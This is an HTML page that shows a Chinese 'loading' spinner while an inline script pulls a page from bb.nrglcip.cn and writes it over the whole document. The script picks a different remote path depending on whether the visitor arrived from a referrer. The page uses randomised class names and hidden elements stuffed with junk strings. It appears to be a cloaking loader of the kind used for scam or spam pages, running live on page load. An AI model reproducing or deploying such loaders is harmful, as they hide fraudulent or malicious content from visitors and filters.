<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .QssKRoMKO {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .QssKRoMKO .DZLl1QPJKH {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .QssKRoMKO .content {
            line-height: 50px;
            text-align: center
        }

        .QssKRoMKO .img {
            width: 100%
        }

        .QssKRoMKO .X4Rs5hhEG3 {
            text-align: center
        }

        .QssKRoMKO .X4Rs5hhEG3 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .QssKRoMKO .X4Rs5hhEG3 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .QssKRoMKO .X4Rs5hhEG3 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .QssKRoMKO .X4Rs5hhEG3 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .QssKRoMKO .X4Rs5hhEG3 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .QssKRoMKO .X4Rs5hhEG3 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .QssKRoMKO .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function w1wLThyXMl(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var cFiLU = w1wLThyXMl('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ cFiLU +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ cFiLU +".html?a=share";
		}
		
        cH9BOPv14y=url+"#"+new Date().getTime();
        cH9BOPv14y && function() {
            $.get(cH9BOPv14y, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>Wv9W9snOB1ag13h6jd7ITNiHJg1pSg</span>
<b style='display:none' >fvvI4xi4btlpFnoSlK2xAtYGJuXdOKq3u2wOkyEkaRLl838Xo</b>
<a  href='#' style='display:none'>P3zYsWONg6BJKgMzFrUYNDl2vutBsMbYjB56xSj4cTYXShE</a>
<div style='display:none'>QhjsDYVEYs4Tk7Idk0FeGWrcfrLmJLBwWtYZWJ3gHVQCtf3mi8QsI9CXANPx24i9wQiyA126</div>
<b style='display:none' >fvvI4xi4btlpFnoSlK2xAtYGJuXdOKq3u2wOkyEkaRLl838Xo</b>
<h1 style='display:none' >K5FFTOyiNBLxnQTZuUOfHmK0VhBwM9BAYmCZ3iPM3nT6TROMwhWIZCgXb4y</h1><div class="QssKRoMKO">
    <div class="DZLl1QPJKH">
        <div class="X4Rs5hhEG3">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>sDBdk9qOfePf9fRBePrLPYGMgJgaeDfHxtDzIHAHiirVKyyrJtxfp7PLHl</span>
<div style='display:none'>TzrOATUjh1mKFpUt6JitiqyrUAcyAl</div>
<b style='display:none' >kuoBmKhdJPpIuNxJeSicMn</b>
<li style='display:none' >t2SguATjYar5CUUylayRs1gUspOJjJ7yv8TA3cUPNOBdIrAeerNcqikRbsAY1RBAMspXVDF8uBsn8G77N2xw6fKjCxdjQiwv</li>
<li style='display:none' >t2SguATjYar5CUUylayRs1gUspOJjJ7yv8TA3cUPNOBdIrAeerNcqikRbsAY1RBAMspXVDF8uBsn8G77N2xw6fKjCxdjQiwv</li>
<h1 style='display:none' >Q9XGHK3iTmvBRxLJjlN29smPgK84ayj5jw</h1>
<h1 style='display:none' >Q9XGHK3iTmvBRxLJjlN29smPgK84ayj5jw</h1>
<b style='display:none' >kuoBmKhdJPpIuNxJeSicMn</b></body>
</html>